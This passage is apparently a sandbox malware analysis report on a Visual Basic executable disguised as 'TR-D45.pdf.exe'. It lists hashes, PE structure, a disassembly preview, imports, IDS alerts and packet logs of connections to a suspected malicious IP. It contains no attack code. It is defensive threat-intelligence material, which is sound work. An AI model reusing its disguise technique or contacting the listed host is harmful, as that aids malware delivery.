                                                      • 192.185.152.65
                                                      dde1df2ac5845a19823cabe182fcd870.exeGet hashmaliciousBrowse
                                                      • 192.185.152.65
                                                      BYRkah8GsZ.exeGet hashmaliciousBrowse
                                                      • 192.185.152.65
                                                      https://www.canva.com/design/DAEN3YdYVHw/zaVHWoDx-9G9l20JXWSBtg/view?utm_content=DAEN3YdYVHw&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                      • 192.185.152.65
                                                      splwow64.exeGet hashmaliciousBrowse
                                                      • 192.185.152.65
                                                      NyUnwsFSCa.exeGet hashmaliciousBrowse
                                                      • 192.185.152.65
                                                      https://signup.kwikvpn.com/Get hashmaliciousBrowse
                                                      • 192.185.152.65
                                                      AWB# 9284730932.exeGet hashmaliciousBrowse
                                                      • 192.185.152.65

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      No created / dropped files found

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):4.753776785310815
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.15%
                                                      • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:TR-D45.pdf.exe
                                                      File size:86016
                                                      MD5:937841064411662c36469498ea645660
                                                      SHA1:7e72225620b06b6d9f5d54ee45ca2dd7ba10e87e
                                                      SHA256:3b162f2943b2ee8d6075b2f8f4cbd7832e11b50ecdfcb4a68cf18eb1c7614651
                                                      SHA512:5b5b035ab1829b2aaabce570767de93f77d07d291cf32df2d899b21b68bec3c66b77fc758f18b730161ddd7b22cf0b07c4efaeaa8d1917eae8073a6e52e7eac2
                                                      SSDEEP:768:dM21YSCVEWuYk96U1N+2gC3UGHNbdfJ+fQ2uepQc5408zZkOcG:hYSwuYk22gdyN2bueypaOZ
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......_.....................@......`........ ....@................

                                                      File Icon

                                                      Icon Hash:00d6d4ec71b24430

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x401360
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                      DLL Characteristics:
                                                      Time Stamp:0x5FB6BE0B [Thu Nov 19 18:48:43 2020 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:0cb4f4ece3f5875b40d2bf4babdf78ef

                                                      Entrypoint Preview

                                                      Instruction
                                                      push 004039FCh
                                                      call 00007FF010A07145h
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      xor byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      inc eax
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add bl, ch
                                                      inc ebp
                                                      fdivrp st(2), st(0)
                                                      mov bh, CCh
                                                      mov ecx, 0FD68147h
                                                      sub al, 94h
                                                      insd
                                                      leave
                                                      lahf
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add dword ptr [eax], eax
                                                      add byte ptr [eax], al
                                                      and byte ptr [eax], ah
                                                      and byte ptr [eax], ah
                                                      and byte ptr [eax], ah
                                                      imul ebp, dword ptr [esi+66h], 6978656Ch
                                                      outsd
                                                      outsb
                                                      popad
                                                      insb
                                                      add byte ptr [esi+75h], ah
                                                      insb
                                                      outsb
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      dec esp
                                                      xor dword ptr [eax], eax
                                                      add dword ptr [eax+72BB315Ah], esp
                                                      int 73h
                                                      dec esp
                                                      mov ah, DEh
                                                      cli
                                                      and dword ptr [ebx+56B47994h], 03h
                                                      dec ecx
                                                      push esp
                                                      enter 4848h, A1h
                                                      mov al, 2Bh
                                                      xchg dword ptr [edi+3AD0135Dh], edi
                                                      dec edi
                                                      lodsd
                                                      xor ebx, dword ptr [ecx-48EE309Ah]
                                                      or al, 00h
                                                      stosb
                                                      add byte ptr [eax-2Dh], ah
                                                      xchg eax, ebx
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      dec eax
                                                      and eax, 25100000h
                                                      add byte ptr [eax], al
                                                      add byte ptr [6F635300h], cl
                                                      jc 00007FF010A071C0h
                                                      jne 000071BFh
                                                      outsb
                                                      jnc 00007FF010A071C6h
                                                      cmp byte ptr [eax], al
                                                      or eax, 55001101h

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x115b40x28.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x15d8.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x10000xe4.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x109c40x11000False0.357579848346data5.29889463041IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .data0x120000x118c0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x140000x15d80x2000False0.138427734375data1.78813993068IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
                                                      RT_ICON0x153f00x1e8data
                                                      RT_ICON0x14d280x6c8data
                                                      RT_ICON0x143a00x988data
                                                      RT_GROUP_ICON0x143700x30data
                                                      RT_VERSION0x141500x220dataGreekGreece

                                                      Imports

                                                      DLLImport
                                                      MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaCastObjVar, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarDup, __vbaVarLateMemCallLd, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                                      Version Infos

                                                      DescriptionData
                                                      Translation0x0408 0x04b0
                                                      InternalNameSBEKASSEBILER
                                                      FileVersion2.00
                                                      CompanyNameGallup
                                                      ProductNameGallup
                                                      ProductVersion2.00
                                                      OriginalFilenameSBEKASSEBILER.exe

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      GreekGreece

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      11/20/20-09:05:53.419410TCP1201ATTACK-RESPONSES 403 Forbidden804974334.102.136.180192.168.2.5
                                                      11/20/20-09:06:40.687797ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8
                                                      11/20/20-09:06:41.688704ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8
                                                      11/20/20-09:06:43.702857ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 20, 2020 09:04:53.014657974 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.148817062 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.148917913 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.183671951 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.317677021 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.319329023 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.319369078 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.319391966 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.319427013 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.319459915 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.540272951 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.675340891 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.675415039 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.702871084 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.841784000 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.841814995 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.841834068 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.841850042 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.841865063 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.841881990 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.841897964 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.841914892 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.841932058 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.841933012 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.841953993 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.841973066 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.841978073 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.841981888 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.842011929 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.975908995 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.975929022 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.975982904 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.975987911 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.976001024 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.976021051 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.976035118 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.976042032 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.976061106 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.976063967 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.976078987 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.976089954 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.976095915 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.976114035 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.976126909 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.976130009 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.976147890 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.976161957 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.976165056 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.976186991 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.976186991 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.976206064 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.976216078 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.976226091 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.976243019 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.976243973 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.976259947 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.976268053 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.976278067 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.976294994 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:53.976308107 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:53.976334095 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.110428095 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110456944 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110474110 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110491037 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110508919 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110508919 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.110522032 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110533953 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110547066 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110553026 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.110560894 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110584021 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110603094 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110603094 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.110620975 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110632896 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.110637903 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110656023 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110660076 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.110671997 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110688925 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110693932 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.110706091 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110727072 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110739946 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.110748053 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110757113 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.110768080 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110780001 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110788107 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.110794067 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110809088 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110821009 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110832930 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110846043 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110857964 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.110862970 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110876083 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110888004 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110910892 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110912085 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.110937119 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.110974073 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.110974073 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.110994101 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.111011028 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.111021042 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.111027956 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.111051083 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.111052990 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.111069918 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.111085892 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.111087084 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.111103058 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.111119986 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.111124039 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.111136913 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.111160994 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.111182928 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.245289087 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245326996 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245348930 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245383024 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245394945 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.245403051 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245421886 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.245428085 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245431900 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.245445967 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245467901 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.245471001 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245492935 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245516062 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245517969 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.245537996 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245539904 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.245563030 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245588064 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245589972 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.245609045 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245630980 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245635986 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.245651007 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245668888 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245676041 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.245682001 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245698929 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245702028 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.245718956 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245738029 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245740891 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.245759964 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245765924 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.245784998 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245800018 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.245806932 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245830059 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245846987 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.245851994 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245872974 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.245873928 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245901108 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245913029 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.245925903 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245949984 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245965958 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.245975971 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.245987892 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246001959 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246006012 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246027946 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246028900 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246054888 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246056080 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246082067 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246082067 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246104956 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246112108 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246128082 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246136904 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246162891 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246162891 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246187925 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246205091 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246211052 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246229887 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246234894 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246254921 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246264935 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246277094 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246288061 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246304989 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246320009 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246329069 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246350050 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246357918 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246371031 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246393919 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246398926 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246416092 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246423960 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246438026 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246457100 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246462107 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246485949 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246490002 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246507883 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246527910 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246529102 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246551991 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246567011 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246572018 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246593952 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246603012 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246615887 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246635914 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246635914 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246661901 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246663094 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246687889 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246697903 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246711016 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246718884 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246732950 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246745110 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246757984 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246766090 CET49718443192.168.2.5192.185.152.65
